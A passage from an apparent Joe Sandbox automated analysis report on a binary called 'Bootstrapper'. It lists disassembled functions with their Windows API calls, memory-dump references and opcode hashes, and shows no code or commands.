Opcode Fuzzy Hash: ed70dac46dc6fb3723909c53ed54f23fb9ab5f1bcb2ce6fc21ef4dbb5b02ae23
Instruction Fuzzy Hash: E871D271500B849EDB35DB70CC95AE7F7E9AF14301F40192EE2ABA7281DA326AC4CF11

Function 00E08284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E08289

Part of subcall function 00E013DC: __EH_prolog.LIBCMT ref: 00E013E1

Part of subcall function 00E0A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E0A598

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 04053666bd578900454908af92eba5d09e7eef8d990be56106658cbc634a80b2
Instruction ID: 0f7f149fe8b37018ea4d1d3660424ffc95a24375791595d67ddbe4c16f9d3555
Opcode Fuzzy Hash: 04053666bd578900454908af92eba5d09e7eef8d990be56106658cbc634a80b2
Instruction Fuzzy Hash: EC41B5719446589ADB20EBA0CD55AEAB3B8AF40304F0424EAE1DAB70D3EB755FC4CF10

Function 00E013E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E013E1

Part of subcall function 00E05E37: __EH_prolog.LIBCMT ref: 00E05E3C

Part of subcall function 00E0CE40: __EH_prolog.LIBCMT ref: 00E0CE45

Part of subcall function 00E0B505: __EH_prolog.LIBCMT ref: 00E0B50A

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3beecffe41e1592f88d90101d797bf4f4e5a69357da94ba08beb5e4644d75b3f
Instruction ID: 8be30ff35cae28cfc634633eaa2f93b2ad0300d6559acd51498ab987b042c670
Opcode Fuzzy Hash: 3beecffe41e1592f88d90101d797bf4f4e5a69357da94ba08beb5e4644d75b3f
Instruction Fuzzy Hash: 8F4158B0905B409EE724CF798885AE7FBE5BF18300F50596EE5FE97282CB716694CB10

Function 00E013DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E013E1

Part of subcall function 00E05E37: __EH_prolog.LIBCMT ref: 00E05E3C

Part of subcall function 00E0CE40: __EH_prolog.LIBCMT ref: 00E0CE45

Part of subcall function 00E0B505: __EH_prolog.LIBCMT ref: 00E0B50A

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f38cc2fed1f7dcbe003f44648be20f4bf9a5e3972d278ed3eae5cfc3c0d5cce1
Instruction ID: df570d22dc215dc5369f53e7400bb37255fd804926af54e53210ee5008edad2d
Opcode Fuzzy Hash: f38cc2fed1f7dcbe003f44648be20f4bf9a5e3972d278ed3eae5cfc3c0d5cce1
Instruction Fuzzy Hash: 344167B0905B409EE724CF798885AE6FBE5BF18300F50596EE5FE97282CB712694CB10

Function 00E1B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E1B098

Part of subcall function 00E013DC: __EH_prolog.LIBCMT ref: 00E013E1

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f0a7082a265daf5837ce2ba3571bac606cd313e067ab5caee1637429ded2a296
Instruction ID: 195aba5829aad6954f2b4bb026b134c500f7da1c2b404cf0e92759ab0edd7f12
Opcode Fuzzy Hash: f0a7082a265daf5837ce2ba3571bac606cd313e067ab5caee1637429ded2a296
Instruction Fuzzy Hash: E4316B71D05249AACF15DF64D8519EEBBF4AF09304F10549EE809B7282D735AE44CBA1

Function 00E2AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00E2ACF8

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: d914477b4c047877e201c93d7abe3ca6ec1a77c4416e28475031b1f51de7d588
Instruction ID: 99f01c5b8defbda0ab3f226c96c70e1ea8e6968c49cc5842970b489d4d7a9196
Opcode Fuzzy Hash: d914477b4c047877e201c93d7abe3ca6ec1a77c4416e28475031b1f51de7d588
Instruction Fuzzy Hash: 4A113A336006395F8B219E2DFC4189AB396AB8436871E5131FC15FB354D730DC0187D2

Function 00E09215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E0921A

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 69ddabd6fc9b3123efc7e2a37127c6bc6c252d42856a55d40df06b9ee6240064
Instruction ID: 2b5cc4d370b530b5b87421442f6931bac836724c5ce21aa62b043499f5be9667
Opcode Fuzzy Hash: 69ddabd6fc9b3123efc7e2a37127c6bc6c252d42856a55d40df06b9ee6240064
Instruction Fuzzy Hash: 74016533D01568ABCF15AFA8CD819DEB775AF88750F015515F816BB2A3DA348D84C7A0

Function 00E2C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00E2B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E29813,00000001,00000364,?,00E23F73,00000050,?,00E41030,00000200), ref: 00E2B177

_free.LIBCMT ref: 00E2C4E5

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: 73924358ec96e638e5dac4152582682ea768298023e9b356e75ff455a489b488
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: DD0149722003156BE3319F65E88196EFBECFB89330F35192DE194A32C1EA30A905C734

Function 00E2B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E29813,00000001,00000364,?,00E23F73,00000050,?,00E41030,00000200), ref: 00E2B177

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d19a87f4a63203ef348adedb9f74c9d8194354bef2b6b76cd50a565db589a867
Instruction ID: a0393f03da5a66b45392e80502954f805d27a01ae6a870be0da45e342437c6fa
Opcode Fuzzy Hash: d19a87f4a63203ef348adedb9f74c9d8194354bef2b6b76cd50a565db589a867
Instruction Fuzzy Hash: 29F0B4325075386BEB215A22BC1AB9F7788AB41770B18A151F808BA191CB60D92182E0

Function 00E23C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00E23C3F

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: cb563128bdac267788392a6c1cf53eb575b98b416bcb05ee304b92af170f2b50
Instruction ID: bf79ab7dc1c63ccbdcea2c3b4429874b3684c7493c3f12ae66055188713124a7
Opcode Fuzzy Hash: cb563128bdac267788392a6c1cf53eb575b98b416bcb05ee304b92af170f2b50
Instruction Fuzzy Hash: 3FF0A0322002269F8F158EB9FC0599AB7A9EF01B647105224FA15F7190DB35DA20CFA0

Function 00E28E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E2CA2C,00000000,?,00E26CBE,?,00000008,?,00E291E0,?,?,?), ref: 00E28E38

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d8be523cf62eb37b8d683d174df67e54b4320bf368efe84cd9871df2f742db10
Instruction ID: cb109408337e73f1cb293670665568b94c33659da7173ef942eebdc958a3af5f
Opcode Fuzzy Hash: d8be523cf62eb37b8d683d174df67e54b4320bf368efe84cd9871df2f742db10
Instruction Fuzzy Hash: C3E06D316072355AEA712666BE09B9F7A889F417B8F177121AC59B6091CF60CC0082E2

Function 00E05ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E05AC2

Part of subcall function 00E0B505: __EH_prolog.LIBCMT ref: 00E0B50A

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 234c6dfd1a73402b03922c3d59cc6c59663236b3925f7a76987aad00055c7209
Instruction ID: 7d8d1a7d27b2f31dad298f477075a99ce773f3ef5bb984077abc67e7d9d8509c
Opcode Fuzzy Hash: 234c6dfd1a73402b03922c3d59cc6c59663236b3925f7a76987aad00055c7209
Instruction Fuzzy Hash: E3018C30810690DED725E7B8C0457DDFBE4AF64304F50948EA45A73682CBB81B88D7A2

Function 00E0A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00E0A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6C4
Part of subcall function 00E0A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6F2
Part of subcall function 00E0A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E0A598

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: b05ac6bd292a5113e17ad9a7ac8c10c2d2819a6611117390c721a2190f2a76a0
Instruction ID: d639ead0658883d19a5bd1a2b65ab672f33bad6f1193ec21c7401482d43b2db4
Opcode Fuzzy Hash: b05ac6bd292a5113e17ad9a7ac8c10c2d2819a6611117390c721a2190f2a76a0
Instruction Fuzzy Hash: 25F05E31009794AECA225BB48905BCABBE06F1A321F089A59F1F9621E6C27550D89B23

Function 00E10E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00E10E3D

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: dc116d49f2364733f1a078ef6f7bde045f80e133bad6d60554ac4d950f435131
Instruction ID: e8245a592020f32bbb22896583922c61b2e0e2e06118f4993b455aeebbdc1dd4
Opcode Fuzzy Hash: dc116d49f2364733f1a078ef6f7bde045f80e133bad6d60554ac4d950f435131
Instruction Fuzzy Hash: 0CD02B206050645EEF21733A6859BFE2A868FC7310F0C20A5F1457B5D3CE8408C7A261

Function 00E1A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00E1A62C

Part of subcall function 00E1A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E1A3DA

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: eb668b2a705ddc836a807c7f157498a6bb8538760badb75bc30e42e487cc0e2c
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: D9D0C971215209BADF526B618C12AFE7AE9EB00744F089139BC42E5291EAB1D990A662

Function 00E1E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00E1E5E3

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 17ab5cebd37eed04d7a48daef3b36c18c1a0c65582451e6f5316948bd1d4858d
Instruction ID: ee0f9ec1acce499377e00142ff6e39fe75d055426ea58ad83a1004a2f0d4fe55
Opcode Fuzzy Hash: 17ab5cebd37eed04d7a48daef3b36c18c1a0c65582451e6f5316948bd1d4858d
Instruction Fuzzy Hash: FFD022B02C42408FD30BEBA9B846FCDB7E2B324788FC82081F924F1390CBA080C4D601

Function 00E1DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00E11B3E), ref: 00E1DD92

Part of subcall function 00E1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1B579
Part of subcall function 00E1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B58A
Part of subcall function 00E1B568: IsDialogMessageW.USER32(0001045E,?), ref: 00E1B59E
Part of subcall function 00E1B568: TranslateMessage.USER32(?), ref: 00E1B5AC
Part of subcall function 00E1B568: DispatchMessageW.USER32(?), ref: 00E1B5B6

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 905d9e0b35903f9f176dd350da464e38fd874e148da0513212e70dddb59c6345
Instruction ID: 4c1891e9ba1d60fd7e9bc9d9d5aa0d79c33072ec01afbf0677158888fed12fa0
Opcode Fuzzy Hash: 905d9e0b35903f9f176dd350da464e38fd874e148da0513212e70dddb59c6345
Instruction Fuzzy Hash: C4D09E71144300BED6012B52DE06F0F7AE7AB89B04F004955B394740B28AB29D61EB11

Function 00E098BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00E097BE), ref: 00E098C8

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 3c6ba4e1b224281b914e7615b05aca6441d8151f71e59fbf9fb6ed72e6b06af9
Instruction ID: 79e1ec5ff1a4a810661cad48fca712d18e050d56d7d7ace3a4e65420a7a18e2f
Opcode Fuzzy Hash: 3c6ba4e1b224281b914e7615b05aca6441d8151f71e59fbf9fb6ed72e6b06af9
Instruction Fuzzy Hash: 31C0127440020585CE284E3498480957711AB533797B4E694D068951E3C332CCC7EB20

Function 00E1E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: afa25b056d61dc760142f3aaceab61eecd469b0242bd6517a7d731e8d610db0a
